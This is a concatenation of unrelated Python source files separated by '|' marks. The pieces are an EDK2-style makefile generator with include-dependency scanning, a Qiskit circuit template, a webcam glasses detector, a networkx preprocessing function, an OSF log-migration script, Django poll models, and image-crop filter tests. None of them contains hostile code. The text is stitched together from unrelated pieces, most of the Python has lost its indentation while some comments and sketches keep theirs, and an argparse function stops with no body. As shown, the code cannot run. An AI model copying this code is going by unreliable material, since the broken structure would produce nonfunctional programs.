Separator = self._SEP_[self._Platform]
MyAgo = self._AutoGenObject
if self._FileType not in MyAgo.CustomMakefile:
EdkLogger.error('build', OPTION_NOT_SUPPORTED, "No custom makefile for %s" % self._FileType,
ExtraData="[%s]" % str(MyAgo))
MakefilePath = mws.join(
MyAgo.WorkspaceDir,
MyAgo.CustomMakefile[self._FileType]
)
try:
CustomMakefile = open(MakefilePath, 'r').read()
except:
EdkLogger.error('build', FILE_OPEN_FAILURE, File=str(MyAgo),
ExtraData=MyAgo.CustomMakefile[self._FileType])
# tools definitions
ToolsDef = []
for Tool in MyAgo.BuildOption:
# Don't generate MAKE_FLAGS in makefile. It's put in environment variable.
if Tool == "MAKE":
continue
for Attr in MyAgo.BuildOption[Tool]:
if Attr == "FAMILY":
continue
elif Attr == "PATH":
ToolsDef.append("%s = %s" % (Tool, MyAgo.BuildOption[Tool][Attr]))
else:
ToolsDef.append("%s_%s = %s" % (Tool, Attr, MyAgo.BuildOption[Tool][Attr]))
ToolsDef.append("")
MakefileName = self.getMakefileName()
MakefileTemplateDict = {
"makefile_header" : self._FILE_HEADER_[self._FileType],
"makefile_path" : os.path.join("$(MODULE_BUILD_DIR)", MakefileName),
"platform_name" : self.PlatformInfo.Name,
"platform_guid" : self.PlatformInfo.Guid,
"platform_version" : self.PlatformInfo.Version,
"platform_relative_directory": self.PlatformInfo.SourceDir,
"platform_output_directory" : self.PlatformInfo.OutputDir,
"platform_dir" : MyAgo.Macros["PLATFORM_DIR"],
"module_name" : MyAgo.Name,
"module_guid" : MyAgo.Guid,
"module_name_guid" : MyAgo.UniqueBaseName,
"module_version" : MyAgo.Version,
"module_type" : MyAgo.ModuleType,
"module_file" : MyAgo.MetaFile,
"module_file_base_name" : MyAgo.MetaFile.BaseName,
"module_relative_directory" : MyAgo.SourceDir,
"module_dir" : mws.join (MyAgo.WorkspaceDir, MyAgo.SourceDir),
"architecture" : MyAgo.Arch,
"toolchain_tag" : MyAgo.ToolChain,
"build_target" : MyAgo.BuildTarget,
"platform_build_directory" : self.PlatformInfo.BuildDir,
"module_build_directory" : MyAgo.BuildDir,
"module_output_directory" : MyAgo.OutputDir,
"module_debug_directory" : MyAgo.DebugDir,
"separator" : Separator,
"module_tool_definitions" : ToolsDef,
"shell_command_code" : list(self._SHELL_CMD_[self._Platform].keys()),
"shell_command" : list(self._SHELL_CMD_[self._Platform].values()),
"create_directory_command" : self.GetCreateDirectoryCommand(self.IntermediateDirectoryList),
"custom_makefile_content" : CustomMakefile
}
return MakefileTemplateDict
## PlatformMakefile class
#
# This class encapsulates the makefile and its generation for a platform. It uses
# a template to generate the content of the makefile, which is obtained from the
# PlatformAutoGen object.
#
class PlatformMakefile(BuildFile):
## template used to generate the makefile for platform
_TEMPLATE_ = TemplateString('''\
${makefile_header}
#
# Platform Macro Definition
#
PLATFORM_NAME = ${platform_name}
PLATFORM_GUID = ${platform_guid}
PLATFORM_VERSION = ${platform_version}
PLATFORM_FILE = ${platform_file}
PLATFORM_DIR = ${platform_dir}
PLATFORM_OUTPUT_DIR = ${platform_output_directory}
#
# Build Configuration Macro Definition
#
TOOLCHAIN = ${toolchain_tag}
TOOLCHAIN_TAG = ${toolchain_tag}
TARGET = ${build_target}
#
# Build Directory Macro Definition
#
BUILD_DIR = ${platform_build_directory}
FV_DIR = ${platform_build_directory}${separator}FV
#
# Shell Command Macro
#
${BEGIN}${shell_command_code} = ${shell_command}
${END}
MAKE = ${make_path}
MAKE_FILE = ${makefile_path}
#
# Default target
#
all: init build_libraries build_modules
#
# Initialization target: print build information and create necessary directories
#
init:
\t-@echo Building ... $(PLATFORM_FILE) [${build_architecture_list}]
\t${BEGIN}-@${create_directory_command}
\t${END}
#
# library build target
#
libraries: init build_libraries
#
# module build target
#
modules: init build_libraries build_modules
#
# Build all libraries:
#
build_libraries:
${BEGIN}\t@"$(MAKE)" $(MAKE_FLAGS) -f ${library_makefile_list} pbuild
${END}\t@cd $(BUILD_DIR)
#
# Build all modules:
#
build_modules:
${BEGIN}\t@"$(MAKE)" $(MAKE_FLAGS) -f ${module_makefile_list} pbuild
${END}\t@cd $(BUILD_DIR)
#
# Clean intermediate files
#
clean:
\t${BEGIN}-@${library_build_command} clean
\t${END}${BEGIN}-@${module_build_command} clean
\t${END}@cd $(BUILD_DIR)
#
# Clean all generated files except the makefile
#
cleanall:
${BEGIN}\t${cleanall_command}
${END}
#
# Clean all library files
#
cleanlib:
\t${BEGIN}-@${library_build_command} cleanall
\t${END}@cd $(BUILD_DIR)\n
''')
## Constructor of PlatformMakefile
#
# @param ModuleAutoGen Object of PlatformAutoGen class
#
def __init__(self, PlatformAutoGen):
BuildFile.__init__(self, PlatformAutoGen)
self.ModuleBuildCommandList = []
self.ModuleMakefileList = []
self.IntermediateDirectoryList = []
self.ModuleBuildDirectoryList = []
self.LibraryBuildDirectoryList = []
self.LibraryMakeCommandList = []
self.DependencyHeaderFileSet = set()
# Compose a dict object containing information used to do replacement in template
@property
def _TemplateDict(self):
Separator = self._SEP_[self._Platform]
MyAgo = self._AutoGenObject
if "MAKE" not in MyAgo.ToolDefinition or "PATH" not in MyAgo.ToolDefinition["MAKE"]:
EdkLogger.error("build", OPTION_MISSING, "No MAKE command defined. Please check your tools_def.txt!",
ExtraData="[%s]" % str(MyAgo))
self.IntermediateDirectoryList = ["$(BUILD_DIR)"]
self.ModuleBuildDirectoryList = self.GetModuleBuildDirectoryList()
self.LibraryBuildDirectoryList = self.GetLibraryBuildDirectoryList()
MakefileName = self.getMakefileName()
LibraryMakefileList = []
LibraryMakeCommandList = []
for D in self.LibraryBuildDirectoryList:
D = self.PlaceMacro(D, {"BUILD_DIR":MyAgo.BuildDir})
Makefile = os.path.join(D, MakefileName)
Command = self._MAKE_TEMPLATE_[self._Platform] % {"file":Makefile}
LibraryMakefileList.append(Makefile)
LibraryMakeCommandList.append(Command)
self.LibraryMakeCommandList = LibraryMakeCommandList
ModuleMakefileList = []
ModuleMakeCommandList = []
for D in self.ModuleBuildDirectoryList:
D = self.PlaceMacro(D, {"BUILD_DIR":MyAgo.BuildDir})
Makefile = os.path.join(D, MakefileName)
Command = self._MAKE_TEMPLATE_[self._Platform] % {"file":Makefile}
ModuleMakefileList.append(Makefile)
ModuleMakeCommandList.append(Command)
MakefileTemplateDict = {
"makefile_header" : self._FILE_HEADER_[self._FileType],
"makefile_path" : os.path.join("$(BUILD_DIR)", MakefileName),
"make_path" : MyAgo.ToolDefinition["MAKE"]["PATH"],
"makefile_name" : MakefileName,
"platform_name" : MyAgo.Name,
"platform_guid" : MyAgo.Guid,
"platform_version" : MyAgo.Version,
"platform_file" : MyAgo.MetaFile,
"platform_relative_directory": MyAgo.SourceDir,
"platform_output_directory" : MyAgo.OutputDir,
"platform_build_directory" : MyAgo.BuildDir,
"platform_dir" : MyAgo.Macros["PLATFORM_DIR"],
"toolchain_tag" : MyAgo.ToolChain,
"build_target" : MyAgo.BuildTarget,
"shell_command_code" : list(self._SHELL_CMD_[self._Platform].keys()),
"shell_command" : list(self._SHELL_CMD_[self._Platform].values()),
"build_architecture_list" : MyAgo.Arch,
"architecture" : MyAgo.Arch,
"separator" : Separator,
"create_directory_command" : self.GetCreateDirectoryCommand(self.IntermediateDirectoryList),
"cleanall_command" : self.GetRemoveDirectoryCommand(self.IntermediateDirectoryList),
"library_makefile_list" : LibraryMakefileList,
"module_makefile_list" : ModuleMakefileList,
"library_build_command" : LibraryMakeCommandList,
"module_build_command" : ModuleMakeCommandList,
}
return MakefileTemplateDict
    ## Get the root directory list for the intermediate files of all module builds
    #
    # @retval list The list of directories
#
def GetModuleBuildDirectoryList(self):
DirList = []
for ModuleAutoGen in self._AutoGenObject.ModuleAutoGenList:
if not ModuleAutoGen.IsBinaryModule:
DirList.append(os.path.join(self._AutoGenObject.BuildDir, ModuleAutoGen.BuildDir))
return DirList
    ## Get the root directory list for the intermediate files of all library builds
    #
    # @retval list The list of directories
#
def GetLibraryBuildDirectoryList(self):
DirList = []
for LibraryAutoGen in self._AutoGenObject.LibraryAutoGenList:
if not LibraryAutoGen.IsBinaryModule:
DirList.append(os.path.join(self._AutoGenObject.BuildDir, LibraryAutoGen.BuildDir))
return DirList
## TopLevelMakefile class
#
# This class encapsulates the entrance (top-level) makefile and its generation. It
# uses a template to generate the content of the makefile, which is obtained from
# the WorkspaceAutoGen object.
#
class TopLevelMakefile(BuildFile):
## template used to generate toplevel makefile
_TEMPLATE_ = TemplateString('''${BEGIN}\tGenFds -f ${fdf_file} --conf=${conf_directory} -o ${platform_build_directory} -t ${toolchain_tag} -b ${build_target} -p ${active_platform} -a ${build_architecture_list} ${extra_options}${END}${BEGIN} -r ${fd} ${END}${BEGIN} -i ${fv} ${END}${BEGIN} -C ${cap} ${END}${BEGIN} -D ${macro} ${END}''')
## Constructor of TopLevelMakefile
#
# @param Workspace Object of WorkspaceAutoGen class
#
def __init__(self, Workspace):
BuildFile.__init__(self, Workspace)
self.IntermediateDirectoryList = []
self.DependencyHeaderFileSet = set()
# Compose a dict object containing information used to do replacement in template
@property
def _TemplateDict(self):
Separator = self._SEP_[self._Platform]
# any platform autogen object is ok because we just need common information
MyAgo = self._AutoGenObject
if "MAKE" not in MyAgo.ToolDefinition or "PATH" not in MyAgo.ToolDefinition["MAKE"]:
EdkLogger.error("build", OPTION_MISSING, "No MAKE command defined. Please check your tools_def.txt!",
ExtraData="[%s]" % str(MyAgo))
for Arch in MyAgo.ArchList:
self.IntermediateDirectoryList.append(Separator.join(["$(BUILD_DIR)", Arch]))
self.IntermediateDirectoryList.append("$(FV_DIR)")
        # TRICK: do not generate the GenFds call in the makefile if there is no FDF file
MacroList = []
if MyAgo.FdfFile is not None and MyAgo.FdfFile != "":
FdfFileList = [MyAgo.FdfFile]
# macros passed to GenFds
MacroDict = {}
MacroDict.update(GlobalData.gGlobalDefines)
MacroDict.update(GlobalData.gCommandLineDefines)
for MacroName in MacroDict:
if MacroDict[MacroName] != "":
MacroList.append('"%s=%s"' % (MacroName, MacroDict[MacroName].replace('\\', '\\\\')))
else:
MacroList.append('"%s"' % MacroName)
else:
FdfFileList = []
# pass extra common options to external program called in makefile, currently GenFds.exe
ExtraOption = ''
LogLevel = EdkLogger.GetLevel()
if LogLevel == EdkLogger.VERBOSE:
ExtraOption += " -v"
elif LogLevel <= EdkLogger.DEBUG_9:
ExtraOption += " -d %d" % (LogLevel - 1)
elif LogLevel == EdkLogger.QUIET:
ExtraOption += " -q"
if GlobalData.gCaseInsensitive:
ExtraOption += " -c"
if not GlobalData.gEnableGenfdsMultiThread:
ExtraOption += " --no-genfds-multi-thread"
if GlobalData.gIgnoreSource:
ExtraOption += " --ignore-sources"
for pcd in GlobalData.BuildOptionPcd:
if pcd[2]:
pcdname = '.'.join(pcd[0:3])
else:
pcdname = '.'.join(pcd[0:2])
if pcd[3].startswith('{'):
ExtraOption += " --pcd " + pcdname + '=' + 'H' + '"' + pcd[3] + '"'
else:
ExtraOption += " --pcd " + pcdname + '=' + pcd[3]
MakefileName = self.getMakefileName()
SubBuildCommandList = []
for A in MyAgo.ArchList:
Command = self._MAKE_TEMPLATE_[self._Platform] % {"file":os.path.join("$(BUILD_DIR)", A, MakefileName)}
SubBuildCommandList.append(Command)
MakefileTemplateDict = {
"makefile_header" : self._FILE_HEADER_[self._FileType],
"makefile_path" : os.path.join("$(BUILD_DIR)", MakefileName),
"make_path" : MyAgo.ToolDefinition["MAKE"]["PATH"],
"platform_name" : MyAgo.Name,
"platform_guid" : MyAgo.Guid,
"platform_version" : MyAgo.Version,
"platform_build_directory" : MyAgo.BuildDir,
"conf_directory" : GlobalData.gConfDirectory,
"toolchain_tag" : MyAgo.ToolChain,
"build_target" : MyAgo.BuildTarget,
"shell_command_code" : list(self._SHELL_CMD_[self._Platform].keys()),
"shell_command" : list(self._SHELL_CMD_[self._Platform].values()),
'arch' : list(MyAgo.ArchList),
"build_architecture_list" : ','.join(MyAgo.ArchList),
"separator" : Separator,
"create_directory_command" : self.GetCreateDirectoryCommand(self.IntermediateDirectoryList),
"cleanall_command" : self.GetRemoveDirectoryCommand(self.IntermediateDirectoryList),
"sub_build_command" : SubBuildCommandList,
"fdf_file" : FdfFileList,
"active_platform" : str(MyAgo),
"fd" : MyAgo.FdTargetList,
"fv" : MyAgo.FvTargetList,
"cap" : MyAgo.CapTargetList,
"extra_options" : ExtraOption,
"macro" : MacroList,
}
return MakefileTemplateDict
    ## Get the root directory list for the intermediate files of all module builds
    #
    # @retval list The list of directories
#
def GetModuleBuildDirectoryList(self):
DirList = []
for ModuleAutoGen in self._AutoGenObject.ModuleAutoGenList:
if not ModuleAutoGen.IsBinaryModule:
DirList.append(os.path.join(self._AutoGenObject.BuildDir, ModuleAutoGen.BuildDir))
return DirList
    ## Get the root directory list for the intermediate files of all library builds
    #
    # @retval list The list of directories
#
def GetLibraryBuildDirectoryList(self):
DirList = []
for LibraryAutoGen in self._AutoGenObject.LibraryAutoGenList:
if not LibraryAutoGen.IsBinaryModule:
DirList.append(os.path.join(self._AutoGenObject.BuildDir, LibraryAutoGen.BuildDir))
return DirList
## Find dependencies for one source file
#
# By recursively searching for "#include" directives in the file, find all the
# files needed by the given source file. Dependencies are searched only in the
# given search path list.
#
# @param File The source file
# @param ForceInculeList The list of files which will be forcibly included
# @param SearchPathList The list of search paths
#
# @retval list The list of files the given source file depends on
#
def GetDependencyList(AutoGenObject, FileCache, File, ForceList, SearchPathList):
EdkLogger.debug(EdkLogger.DEBUG_1, "Try to get dependency files for %s" % File)
FileStack = [File] + ForceList
DependencySet = set()
if AutoGenObject.Arch not in gDependencyDatabase:
gDependencyDatabase[AutoGenObject.Arch] = {}
DepDb = gDependencyDatabase[AutoGenObject.Arch]
while len(FileStack) > 0:
F = FileStack.pop()
FullPathDependList = []
if F in FileCache:
for CacheFile in FileCache[F]:
FullPathDependList.append(CacheFile)
if CacheFile not in DependencySet:
FileStack.append(CacheFile)
DependencySet.update(FullPathDependList)
continue
CurrentFileDependencyList = []
if F in DepDb:
CurrentFileDependencyList = DepDb[F]
else:
try:
Fd = open(F.Path, 'rb')
FileContent = Fd.read()
Fd.close()
except BaseException as X:
EdkLogger.error("build", FILE_OPEN_FAILURE, ExtraData=F.Path + "\n\t" + str(X))
if len(FileContent) == 0:
continue
try:
if FileContent[0] == 0xff or FileContent[0] == 0xfe:
FileContent = FileContent.decode('utf-16')
else:
FileContent = FileContent.decode()
except:
                # The file is not a text file, for example a .mcb file
continue
IncludedFileList = gIncludePattern.findall(FileContent)
for Inc in IncludedFileList:
Inc = Inc.strip()
# if there's macro used to reference header file, expand it
HeaderList = gMacroPattern.findall(Inc)
if len(HeaderList) == 1 and len(HeaderList[0]) == 2:
HeaderType = HeaderList[0][0]
HeaderKey = HeaderList[0][1]
if HeaderType in gIncludeMacroConversion:
Inc = gIncludeMacroConversion[HeaderType] % {"HeaderKey" : HeaderKey}
else:
                        # unknown macro used in #include; always rebuild the file by
                        # returning an empty dependency list
FileCache[File] = []
return []
Inc = os.path.normpath(Inc)
CurrentFileDependencyList.append(Inc)
DepDb[F] = CurrentFileDependencyList
CurrentFilePath = F.Dir
PathList = [CurrentFilePath] + SearchPathList
for Inc in CurrentFileDependencyList:
for SearchPath in PathList:
FilePath = os.path.join(SearchPath, Inc)
if FilePath in gIsFileMap:
if not gIsFileMap[FilePath]:
continue
                # Calling isfile too many times slows performance, so the results are cached in gIsFileMap.
elif not os.path.isfile(FilePath):
gIsFileMap[FilePath] = False
continue
else:
gIsFileMap[FilePath] = True
FilePath = PathClass(FilePath)
FullPathDependList.append(FilePath)
if FilePath not in DependencySet:
FileStack.append(FilePath)
break
else:
EdkLogger.debug(EdkLogger.DEBUG_9, "%s included by %s was not found "\
"in any given path:\n\t%s" % (Inc, F, "\n\t".join(SearchPathList)))
FileCache[F] = FullPathDependList
DependencySet.update(FullPathDependList)
DependencySet.update(ForceList)
if File in DependencySet:
DependencySet.remove(File)
DependencyList = list(DependencySet) # remove duplicate ones
return DependencyList
# This acts like the main() function for the script, unless it is 'import'ed into another script.
if __name__ == '__main__':
pass
|
# -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""
Template 9c_1:
.. parsed-literal::
┌───┐ ┌───┐┌───┐ ┌───┐ ┌───┐
q_0: ┤ X ├──■──┤ X ├┤ X ├─────┤ X ├──■───────┤ X ├
└─┬─┘┌─┴─┐└───┘└─┬─┘┌───┐└─┬─┘┌─┴─┐┌───┐└─┬─┘
q_1: ──■──┤ X ├───────■──┤ X ├──■──┤ X ├┤ X ├──■──
└───┘ └───┘ └───┘└───┘
"""
from qiskit.circuit.quantumcircuit import QuantumCircuit
def template_9c_1():
"""
Returns:
QuantumCircuit: template as a quantum circuit.
"""
qc = QuantumCircuit(2)
qc.cx(1, 0)
qc.cx(0, 1)
qc.x(0)
qc.cx(1, 0)
qc.x(1)
qc.cx(1, 0)
qc.cx(0, 1)
qc.x(1)
qc.cx(1, 0)
return qc
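
# Minimal usage sketch (not part of the original module): build the template and
# check numerically that it composes to the identity, which is the defining
# property of the circuit templates used for template matching.
if __name__ == "__main__":
    from qiskit.quantum_info import Operator
    circuit = template_9c_1()
    print(circuit.draw())
    print(Operator(circuit).equiv(Operator.from_label("II")))  # expected: True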
|
from tensorflow.keras.applications.mobilenet_v2 import preprocess_input
from tensorflow.keras.preprocessing.image import img_to_array
from tensorflow.keras.models import load_model
from imutils.video import VideoStream
import cv2
import numpy as np
import imutils
import time
import os
def detect_glasses(frame, faceNet, glassesNet):
# make blob from image
(h, w) = frame.shape[:2]
blob = cv2.dnn.blobFromImage(frame, 1.0, (224, 224), (104.0, 177.0, 123.0))
# give blob to network and get face detections
faceNet.setInput(blob)
face_detections = faceNet.forward()
# init list of faces and their locations along
# with list of predictions from glasses network
faces = []
locations = []
predictions = []
# for each detection
for i in range(0, face_detections.shape[2]):
# get confidence for each detection
confidence = face_detections[0, 0, i, 2]
# filter out low confidence detections
if confidence > 0.5:
# create the box around face
box = face_detections[0, 0, i, 3:7] * np.array([w, h, w, h])
(startX, startY, endX, endY) = box.astype('int')
# make sure the boxes are in frame
(startX, startY) = (max(0, startX), max(0, startY))
(endX, endY) = (min(w - 1, endX), min(h - 1, endY))
# get the face region of interest
face = frame[startY:endY, startX:endX]
face = cv2.cvtColor(face, cv2.COLOR_BGR2RGB)
face = cv2.resize(face, (224, 224))
face = img_to_array(face)
face = preprocess_input(face)
# add face and box to lists
faces.append(face)
locations.append((startX, startY, endX, endY))
# only make glasses predictions if we detect faces
if len(faces) > 0:
faces = np.array(faces, dtype='float32')
predictions = glassesNet.predict(faces, batch_size=32)
# return tuple with locations & predictions
return (locations, predictions)
# load face detection model from https://github.com/opencv/opencv/tree/3.4.0/samples/dnn
prototxt = r'face_detection/deploy.prototxt'
caffemodel = r'face_detection/res10_300x300_ssd_iter_140000.caffemodel'
faceNet = cv2.dnn.readNet(prototxt, caffemodel)
# load the glasses detection model we made in train.py
glassesNet = load_model('glasses_detection.model')
# start the video stream from webcam
print("[INFO] starting video stream...")
vs = VideoStream(src=0).start()
# loop over video frames
while True:
frame = vs.read()
frame = imutils.resize(frame, width=600)
# detect faces in frame and determine if they're
# wearing glasses or not
(locations, predictions) = detect_glasses(frame, faceNet, glassesNet)
# loop over detected locations
for (box, prediction) in zip(locations, predictions):
(startX, startY, endX, endY) = box
(glasses, withoutGlasses) = prediction
# determine label
label = "Glasses" if glasses > withoutGlasses else "No Glasses"
color = (0, 255, 0) if label == "Glasses" else (0, 0, 255)
# label text with probability
label = "{}: {:.2f}%".format(label, max(glasses, withoutGlasses) * 100)
# display box & label on frame
cv2.putText(frame, label, (startX, startY - 10),
cv2.FONT_HERSHEY_SIMPLEX, 0.45, color, 2)
cv2.rectangle(frame, (startX, startY), (endX, endY), color, 2)
# show output frame
cv2.imshow("Frame", frame)
key = cv2.waitKey(1) & 0xFF
# quit using q key
if key == ord('q'):
break
cv2.destroyAllWindows()
vs.stop()
|
import networkx as nx
import numpy as np

def create_graph(adj_matrix_tmp, dictionary, attribute, val_to_drop, directed_type, delete_na_cols):
    ##################### data preprocessing (part II) ########################
    # Create a graph from an adjacency matrix with gender information, delete
    # nodes without gender information, and keep only the largest connected component.
    # input:
    #     adj_matrix_tmp: an adjacency matrix for the graph
    #     dictionary: (key, value) pairs for each node
    #     attribute: the node property (e.g. gender) to set for each node
    #     val_to_drop: the attribute value marking nodes that must be dropped
    #     directed_type: None to treat the network as undirected
    #     delete_na_cols: 'yes' to also drop the corresponding columns of the adjacency matrix
    # return:
    #     a graph with attribute information for each node, plus the attribute vector
    # note: create_dict(keys, values), used below, is assumed to be defined elsewhere in this module.
    ##########################################################################
graph = nx.from_numpy_matrix(adj_matrix_tmp)
# get the label for each person
keys = np.array(range(len(dictionary.keys())))
    ## we relabel the keys as 0..n-1, but this preserves the correspondence between the values and the updated keys
y_vector_list = list(dictionary.values())
    # create an adjacency matrix whose rows and columns are ordered according to the nodes in dictionary.keys()
adj_matrix_input = nx.adj_matrix(graph,nodelist = dictionary.keys()).todense() # note: will automatically be an out-link matrix when graph is directed
# set each node's attribute to be the key
nx.set_node_attributes(graph,dictionary, attribute)
    ### remove NA-labeled nodes and get a new graph (in which all nodes have a gender label)
keys_new = []
for i in range(len(y_vector_list)):
if y_vector_list[i]!=val_to_drop:
keys_new.append(keys[i])
# convert new keys into an array
keys = np.array(keys_new)
    # delete all val_to_drop elements from y_vector_list
y_vector_list = [c for c in y_vector_list if c != val_to_drop]
# convert y_vector_list into an array
y_vector_list = np.array(y_vector_list)
adj_matrix_input = adj_matrix_input[np.array(keys),:]
# and remove NA nodes in column too
if delete_na_cols == 'yes':
#update the graph and adjacency matrix
adj_matrix_input=adj_matrix_input[:,np.array(keys)]
graph = nx.from_numpy_matrix(adj_matrix_input)
attr_new = create_dict(range(adj_matrix_input.shape[0]),y_vector_list)
nx.set_node_attributes(graph,attr_new,attribute)
## create undirected network, subset to nodes only in largest connected component
if directed_type == None:
if nx.number_connected_components(graph) > 1:
#print(nx.number_connected_components(graph))
max_cc_index = 0
max_cc_size = 0
for c in nx.connected_components(graph):
if graph.subgraph(c).size() > max_cc_size:
max_cc_index = c
max_cc_size = graph.subgraph(c).size()
graph_new = graph.subgraph(max_cc_index)
graph = graph_new
# get the gender vector for each node
gender_vector = nx.get_node_attributes(graph, attribute)
gender_y = list(gender_vector.values())
gender_y = np.array(gender_y)
return(graph, gender_y)
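
# Minimal usage sketch (assumptions: 'NA' marks missing labels, and create_dict,
# normally defined elsewhere in this module, simply zips keys and values into a
# dict; a hypothetical stand-in is provided here only so the example runs).
if __name__ == "__main__":
    if 'create_dict' not in globals():
        def create_dict(keys, values):  # hypothetical stand-in for the external helper
            return dict(zip(keys, values))
    toy_adj = np.array([[0, 1, 1, 0],
                        [1, 0, 1, 0],
                        [1, 1, 0, 0],
                        [0, 0, 0, 0]])
    toy_labels = {0: 'M', 1: 'F', 2: 'NA', 3: 'M'}
    g, y = create_graph(toy_adj, toy_labels, 'gender', 'NA', None, 'yes')
    print(g.number_of_nodes(), list(y))  # the NA-labeled and isolated nodes are dropped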
|
"""Handle the arguments"""
import argparse
def parse(args):
"""Use argparse to parse provided command-line arguments"""
|
import logging
import sys
from framework.transactions.context import TokuTransaction
from website.app import init_app
from website.models import NodeLog, PreprintService
from scripts import utils as script_utils
from modularodm import Q
from modularodm.exceptions import NoResultsFound
logger = logging.getLogger(__name__)
def migrate(dry_run=True):
node_logs = list(NodeLog.find(
Q('action', 'in', [NodeLog.PREPRINT_FILE_UPDATED, NodeLog.PREPRINT_INITIATED]) &
Q('params.preprint', 'exists', False)
))
logger.info('Preparing to migrate {} NodeLogs'.format(len(node_logs)))
count = 0
for log in node_logs:
preprint = None
node_id = log.params.get('node')
try:
preprint = PreprintService.find_one(Q('node', 'eq', node_id))
except NoResultsFound:
logger.error('Skipping {}, preprint not found for node: {}'.format(log._id, node_id))
continue
logger.info(
'Migrating log - {} - to add params.preprint: {}, '.format(log._id, preprint._id)
)
log.params['preprint'] = preprint._id
log.save()
count += 1
logger.info('Migrated {} logs'.format(count))
def main():
dry_run = '--dry' in sys.argv
if not dry_run:
script_utils.add_file_logger(logger, __file__)
init_app(set_backends=True, routes=False)
with TokuTransaction():
migrate(dry_run=dry_run)
if dry_run:
raise RuntimeError('Dry run, transaction rolled back.')
if __name__ == '__main__':
main()
|
from __future__ import unicode_literals
from django.contrib.auth.models import User
from django.db import models
from django.utils.translation import ugettext_lazy as _
class Question(models.Model):
author = models.ForeignKey(verbose_name=_('Автор'), to=User)
title = models.CharField(verbose_name=_('Название'), max_length=200)
text = models.TextField(verbose_name=_('Текст'))
is_active = models.BooleanField(verbose_name=_('Отображать?'), default=True)
class Meta:
verbose_name = _('Вопрос')
verbose_name_plural = _('Вопросы')
def __str__(self):
return self.title
class Choice(models.Model):
question = models.ForeignKey(verbose_name=_('Вопрос'), to=Question, on_delete=models.CASCADE)
title = models.CharField(verbose_name=_('Название'), max_length=200)
text = models.TextField(verbose_name=_('Текст'))
position = models.IntegerField(verbose_name=_('Сортировка'), default=0)
is_active = models.BooleanField(verbose_name=_('Отображать?'), default=True)
class Meta:
verbose_name = _('Ответ')
verbose_name_plural = _('Ответы')
def __str__(self):
return self.title
|
# coding: utf-8
from __future__ import unicode_literals, absolute_import
import numpy as np
from .base import FilterTestCase
from os.path import abspath, join, dirname
STORAGE_PATH = abspath(join(dirname(__file__), 'fixtures'))
filter_data = {
'async': False,
'params': ({'regex': '[-]?(?:(?:[\\d]+\\.?[\\d]*)|(?:[\\d]*\\.?[\\d]+))',
'parse': float},),
'name': 'rmd',
'defaults': None}
class RmdFilterUnittestsTestCase(FilterTestCase):
@classmethod
def setUpClass(cls):
try:
from pyexiv2 import ImageMetadata
except ImportError:
raise ImportError('Pyexiv2 is not available. Please install it.')
def get_fixture_path(self, name):
return join(STORAGE_PATH, name)
def load_file(self, file_name, engine):
with open(join(STORAGE_PATH, file_name), 'rb') as im:
buffer = im.read()
engine.load(buffer, None)
def get_color_at(self, image, x, y):
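        # Classify the pixel at (x, y) by its dominant RGB channel; the test
        # fixture images use distinctly colored regions, so this is enough to
        # verify where a crop landed.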
px = image[y][x]
r, g, b = px[0], px[1], px[2]
if r > b and r > g:
return 'red'
elif g > b and g > r:
return 'green'
elif b > r and b > g:
return 'blue'
elif r == 255 and b == 255 and g == 255:
return 'white'
return 'unknown color ({},{},{})'.format(r, g, b)
def assertCrop(self, context, reference):
crop = (
context['left'], context['top'], context['right'], context['bottom']
)
self.assertEqual(crop, reference)
def test_regions_image(self):
image = self.get_filtered('regions2.jpg', 'universalimages.filters.rmd', 'rmd()')
self.assertEqual(self.get_color_at(image, 0, 0), 'blue')
self.assertEqual(self.get_color_at(image, 0, 100), 'green')
self.assertEqual(self.get_color_at(image, 151, 201), 'red')
def test_small_crop_exact_safe_area1(self):
def config_context(context):
context.request.width = 300
context.request.height = 200
fltr = self.get_filter('universalimages.filters.rmd', 'rmd()',
config_context=config_context)
self.assertFalse(fltr.context.request.should_crop)
self.load_file('regions2.jpg', fltr.engine)
fltr.run()
self.assertTrue(fltr.context.request.should_crop)
self.assertCrop(fltr.context.request.crop, (150, 200, 450, 400))
fltr.context.transformer.img_operation_worker()
self.assertCrop(fltr.context.request.crop, (150, 200, 450, 400))
image = np.array(fltr.engine.image)
self.assertEqual(len(image[0]), 300)
self.assertEqual(len(image), 200)
# self.debug(image)
self.assertEqual(self.get_color_at(image, 0, 0), 'red')
def test_small_crop_less_than_safe_area1(self):
def config_context(context):
context.request.width = 240
context.request.height = 160
fltr = self.get_filter('universalimages.filters.rmd', 'rmd()',
config_context=config_context)
self.assertFalse(fltr.context.request.should_crop)
self.load_file('regions2.jpg', fltr.engine)
fltr.run()
self.assertTrue(fltr.context.request.should_crop)
self.assertCrop(fltr.context.request.crop, (150, 200, 450, 400))
fltr.context.transformer.img_operation_worker()
self.assertCrop(fltr.context.request.crop, (150, 200, 450, 400))
image = np.array(fltr.engine.image)
self.assertEqual(len(image[0]), 240)
self.assertEqual(len(image), 160)
self.assertEqual(self.get_color_at(image, 0, 0), 'red')
def test_small_crop_less_than_safe_area2(self):
def config_context(context):
context.request.width = 200
context.request.height = 200
fltr = self.get_filter('universalimages.filters.rmd', 'rmd()',
config_context=config_context)
self.assertFalse(fltr.context.request.should_crop)
self.load_file('regions2.jpg', fltr.engine)
fltr.run()
self.assertTrue(fltr.context.request.should_crop)
self.assertCrop(fltr.context.request.crop, (150, 133, 450, 433))
fltr.context.transformer.img_operation_worker()
self.assertCrop(fltr.context.request.crop, (150, 133, 450, 433))
image = np.array(fltr.engine.image)
self.assertEqual(len(image[0]), 200)
self.assertEqual(len(image), 200)
self.assertEqual(self.get_color_at(image, 0, 0), 'green')
self.assertEqual(self.get_color_at(image, 0, 88), 'red')
def test_small_crop_less_than_safe_area3(self):
def config_context(context):
context.request.width = 300
context.request.height = 150
fltr = self.get_filter('universalimages.filters.rmd', 'rmd()',
config_context=config_context)
self.assertFalse(fltr.context.request.should_crop)
self.load_file('regions2.jpg', fltr.engine)
fltr.run()
self.assertTrue(fltr.context.request.should_crop)
# 400x200
self.assertCrop(fltr.context.request.crop, (83, 200, 483, 400))
fltr.context.transformer.img_operation_worker()
self.assertCrop(fltr.context.request.crop, (83, 200, 483, 400))
image = np.array(fltr.engine.image)
self.assertEqual(len(image[0]), 300)
self.assertEqual(len(image), 150)
